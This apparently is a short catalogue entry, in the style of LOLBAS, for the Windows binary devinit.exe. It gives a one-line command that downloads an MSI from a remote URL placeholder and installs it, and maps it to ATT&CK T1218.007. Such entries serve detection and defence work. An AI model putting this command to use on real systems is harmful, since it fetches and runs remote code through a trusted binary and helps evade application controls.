Downloads an MSI file to C:\Windows\Installer and then installs it.
devinit.exe run -t msi-install -i {REMOTEURL:.msi}
- Use case
- Executes code from a (remote) MSI file.
- Privileges required
- User
- Operating systems
- Windows 10, Windows 11
- ATT&CKĀ® technique
- T1218.007
- Tags
Execute: MSI
Execute: Remote